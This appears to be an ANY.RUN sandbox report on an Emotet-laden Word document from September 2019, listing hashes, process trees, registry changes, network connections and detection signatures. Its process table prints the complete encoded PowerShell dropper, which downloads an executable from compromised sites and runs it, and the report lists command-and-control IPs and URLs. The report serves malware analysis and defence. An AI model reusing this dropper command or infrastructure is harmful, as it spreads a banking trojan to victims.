analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

FA_OL2ZSH2LZWJ_TTQ.doc

Full analysis: https://app.any.run/tasks/00542684-6c0b-4346-9e73-06ee9e5ece7b
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: September 19, 2019, 09:39:33
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
emotet
trojan
evasion
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Keenan Littel, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Sep 19 09:31:00 2019, Last Saved Time/Date: Thu Sep 19 09:31:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5:

CF7F66CB3C81C45D7871A847723C948D

SHA1:

D66B7AE550230D676990048346CB07C694EBB225

SHA256:

DAC8813F4A23BDAFA4D5466F3756341D7E5DA190D1C37B0A2191148C2C696A7A

SSDEEP:

6144:uYMxYrpgAR86sJEdEG+SRZpLkI07NSU4jZntATfDH3GXq3T:uYMxYrpgAR86sJEdEG+SRfX07NSU4teP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 972.exe (PID: 3600)
      • 972.exe (PID: 2940)
      • 972.exe (PID: 2852)
      • 972.exe (PID: 3688)
      • easywindow.exe (PID: 2012)
      • easywindow.exe (PID: 3056)
      • easywindow.exe (PID: 3408)
      • easywindow.exe (PID: 2288)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2472)
    • Emotet process was detected

      • 972.exe (PID: 3688)
    • EMOTET was detected

      • easywindow.exe (PID: 3056)
    • Changes the autorun value in the registry

      • easywindow.exe (PID: 3056)
    • Connects to CnC server

      • easywindow.exe (PID: 3056)
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 2472)
    • PowerShell script executed

      • powershell.exe (PID: 2472)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2472)
      • 972.exe (PID: 3688)
    • Creates files in the user directory

      • powershell.exe (PID: 2472)
    • Application launched itself

      • 972.exe (PID: 2940)
    • Starts itself from another location

      • 972.exe (PID: 3688)
    • Connects to server without host name

      • easywindow.exe (PID: 3056)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3428)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3428)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: Keenan Littel
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:09:19 08:31:00
ModifyDate: 2019:09:19 08:31:00
Pages: 1
Words: 95
Characters: 547
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 4
Paragraphs: 1
CharCountWithSpaces: 641
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
46
Monitored processes
10
Malicious processes
8
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 972.exe no specs 972.exe no specs 972.exe no specs #EMOTET 972.exe easywindow.exe no specs easywindow.exe no specs easywindow.exe no specs #EMOTET easywindow.exe

Process information

PID
CMD
Path
Indicators
Parent process
3428"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\FA_OL2ZSH2LZWJ_TTQ.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2472powershell -encod JABzAFMATQB3ADcAQwA2AHAAPQAnAGQAdwBTAEwAQQB1AGkAdwAnADsAJABZAF8AdwBfAHMASgBfACAAPQAgACcAOQA3ADIAJwA7ACQAbwB3ADcAaQBzAG4APQAnAFAAbwB3AFIAQgBtACcAOwAkAFoAVQBFAFEARgB3AFUAVgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAWQBfAHcAXwBzAEoAXwArACcALgBlAHgAZQAnADsAJABjAEoATgBMAEgAZAA9ACcAagBLAHcAdgBRAEoAWQBCACcAOwAkAGMARQBwAHQATgAzAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAagBlACcAKwAnAGMAdAAnACkAIABuAGUAVAAuAHcAZQBiAGMATABpAGUATgBUADsAJABjADkARwBJAEsANwA9ACcAaAB0AHQAcAA6AC8ALwBlAGwAZQBjAHQAcgBvAGUAbgBjAGgAdQBmAGUALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwAxADMAYwAzAHkAcQB2AF8AZQBvADQAegBzAHUAOQAtADQAMQA2AC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AZgBvAHgAcgBwAGEAcwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AdgBoAHYAawBwAFgASABTAEgALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBzAHkAZABzADUAOAA4AC4AYwBuAC8AYwBnAGkALQBiAGkAbgAvAEYAdQBlAHYAcgBMAHgARwBnAGEALwBAAGgAdAB0AHAAcwA6AC8ALwB0AGgAbwBuAGcAdABpAG4AZABvAG4AZwBhAG4AaAAuAHYAbgAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBsADUAdwBtAGQAXwBqADIANQB0ADUAagBtADUALQA5AC8AQABoAHQAdABwAHMAOgAvAC8AdABlAGMAYwBlAG4AdABlAHIALgB4AHkAegAvAGMAZwBpAC0AYgBpAG4ALwBpAFMAcQB5AG8ATQBNAHoAYwB0AC8AJwAuACIAUwBgAHAATABpAHQAIgAoACcAQAAnACkAOwAkAEUAZgBRAFMATgBhAGoAPQAnAE0AdwBpAFIAawBsAGMAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEkAUABfAHoAdgB6AHoAIABpAG4AIAAkAGMAOQBHAEkASwA3ACkAewB0AHIAeQB7ACQAYwBFAHAAdABOADMALgAiAEQATwB3AG4ATABgAE8AQQBgAGQAZgBJAEwARQAiACgAJABJAFAAXwB6AHYAegB6ACwAIAAkAFoAVQBFAFEARgB3AFUAVgApADsAJABuAFIARgBUAFYAUQB3AD0AJwBoAEEASQBRAHYATwBjAGoAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAJwArACcAdABlAG0AJwApACAAJABaAFUARQBRAEYAdwBVAFYAKQAuACIAbABlAGAATgBHAHQAaAAiACAALQBnAGUAIAAzADgANAA2ADkAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBgAFQAYQByAHQAIgAoACQAWgBVAEUAUQBGAHcAVQBWACkAOwAkAHcAdwBwAHQANQBOAD0AJwB1AE8ASwB3AEoAdwAnADsAYgByAGUAYQBrADsAJABZAHoASwBfAGYAcQBsADQAPQAnAHoARABQAHoARABxAGIAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAdwBuAFcAWgBIAFoAbABvAD0AJwBLADAAaQBpAGQAMAB1ACcAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3600"C:\Users\admin\972.exe" C:\Users\admin\972.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2852"C:\Users\admin\972.exe" C:\Users\admin\972.exe972.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2940--53fbb8f2C:\Users\admin\972.exe972.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3688--53fbb8f2C:\Users\admin\972.exe
972.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3408"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exe972.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2012"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2288--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3056--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exe
easywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 757
Read events
1 273
Write events
479
Delete events
5

Modification events

(PID) Process:(3428) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:&$
Value:
26242400640D0000010000000000000000000000
(PID) Process:(3428) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(3428) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(3428) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1328742430
(PID) Process:(3428) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1328742544
(PID) Process:(3428) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1328742545
(PID) Process:(3428) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
640D0000D8B7002ECE6ED50100000000
(PID) Process:(3428) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:~%$
Value:
7E252400640D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3428) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:~%$
Value:
7E252400640D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3428) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
2
Suspicious files
10
Text files
0
Unknown types
43

Dropped files

PID
Process
Filename
Type
3428WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9C06.tmp.cvr
MD5:
SHA256:
3428WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:62F2DA178DD59EBA6B61EE250E55F925
SHA256:8CF938206B83D51659082A32A71F3A9F077217F5A2E07A98541350C60245A244
3428WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:133E09639BACDCD78A66BC90940A246F
SHA256:16457F1AE0809C715EF47140420F13404245D2BB85C2ADD3F9977A908C886FF9
3428WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9B122BDD.wmfwmf
MD5:8743B640CA47C5490F9F9451B7BDD4DB
SHA256:1D4ED67653743DD64E536052DCB97848C121B4E24FE4115AA1BF68BDEA1D7A8A
3428WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8F0EE1B7.wmfwmf
MD5:ED98E49A9E06322F608CF40C28AAB980
SHA256:AC3D24FA44AB340369A3B90FCDF4A13C7148DA1F322A344124625B2DAFBAC554
3428WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\81EF1079.wmfwmf
MD5:00E81C93A19AE32E8966490054E58343
SHA256:7A829951CB91D7650CD99D86F1057452110F0AEE55628D4C505CED0584E47478
3428WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$_OL2ZSH2LZWJ_TTQ.docpgc
MD5:C48EFD1C1AC5AD53505A37A491E6BBE1
SHA256:13D64DB4157C951D47A545F90D5749FE85DCC5F32E051DCB07943E2DC1B4FF9B
3428WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\211150D5.wmfwmf
MD5:E603D378FD4658DCF75DB5C45EC37F2D
SHA256:0668BD3B9F3626850945688921966C83390AAFE94D9C2E33433929BD465919CC
3428WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A3A0EC58.wmfwmf
MD5:0C28967EE4B2805DD67CDD301A090EF6
SHA256:6764E7C4269BB803B69B59F07266C0FC4DAB0F3EC501DA45070CCEE85836DEFB
3428WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DF2C4EAB.wmfwmf
MD5:0340869CB9836CA788B4B8182C6FC5BA
SHA256:22E4192C813FFA91283FF3E2209A2BD74D94024206AE69C7F1BABACFE0F59A5D
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
56
DNS requests
59
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3056
easywindow.exe
POST
190.18.146.70:80
http://190.18.146.70/schema/health/ringin/merge/
AR
malicious
3056
easywindow.exe
GET
200
69.43.168.232:443
http://69.43.168.232:443/whoami.php
US
text
12 b
malicious
2472
powershell.exe
GET
200
181.65.214.222:80
http://electroenchufe.com/wp-content/13c3yqv_eo4zsu9-416/
PE
executable
384 Kb
suspicious
3056
easywindow.exe
POST
200
187.147.50.167:8080
http://187.147.50.167:8080/chunk/
MX
binary
148 b
malicious
3056
easywindow.exe
POST
200
69.43.168.232:443
http://69.43.168.232:443/cookies/between/nsip/merge/
US
binary
172 Kb
malicious
3056
easywindow.exe
GET
200
69.43.168.232:443
http://69.43.168.232:443/whoami.php
US
text
12 b
malicious
3056
easywindow.exe
POST
200
187.147.50.167:8080
http://187.147.50.167:8080/glitch/enabled/nsip/merge/
MX
binary
1.38 Mb
malicious
3056
easywindow.exe
POST
200
69.43.168.232:443
http://69.43.168.232:443/cookies/between/nsip/merge/
US
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3056
easywindow.exe
190.18.146.70:80
CABLEVISION S.A.
AR
malicious
3056
easywindow.exe
187.147.50.167:8080
Uninet S.A. de C.V.
MX
malicious
3056
easywindow.exe
74.220.207.167:993
host167.hostmonster.com
Unified Layer
US
unknown
3056
easywindow.exe
69.43.168.232:443
Castle Access Inc
US
malicious
3056
easywindow.exe
204.101.251.122:143
smtp.bellnet.ca
Bell Canada
CA
unknown
2472
powershell.exe
181.65.214.222:80
electroenchufe.com
Telefonica del Peru S.A.A.
PE
suspicious
3056
easywindow.exe
209.237.134.156:110
pop.sscg.net
Defense.Net, Inc
US
malicious
3056
easywindow.exe
208.180.40.196:993
imap.suddenlink.net
Suddenlink Communications
US
unknown
3056
easywindow.exe
66.96.130.119:25
smtp.townofnorridgewock.com
The Endurance International Group, Inc.
US
malicious
3056
easywindow.exe
74.208.5.2:25
smtp.1and1.com
1&1 Internet SE
US
malicious

DNS requests

Domain
IP
Reputation
electroenchufe.com
  • 181.65.214.222
suspicious
smtp.bellnet.ca
  • 204.101.251.122
shared
scr.misv.o
unknown
st.ud.e
unknown
p08-imap.mail.me.com
  • 17.36.205.4
  • 17.36.205.69
unknown
mi.tondsho.r
unknown
pop.sscg.net
  • 209.237.134.156
unknown
ppa.e
unknown
mi.ste.o
unknown
host167.hostmonster.com
  • 74.220.207.167
unknown

Threats

PID
Process
Class
Message
2472
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2472
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2472
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3056
easywindow.exe
A Network Trojan was detected
AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
3056
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3056
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3056
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3056
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3056
easywindow.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
3056
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
9 ETPRO signatures available at the full report
No debug info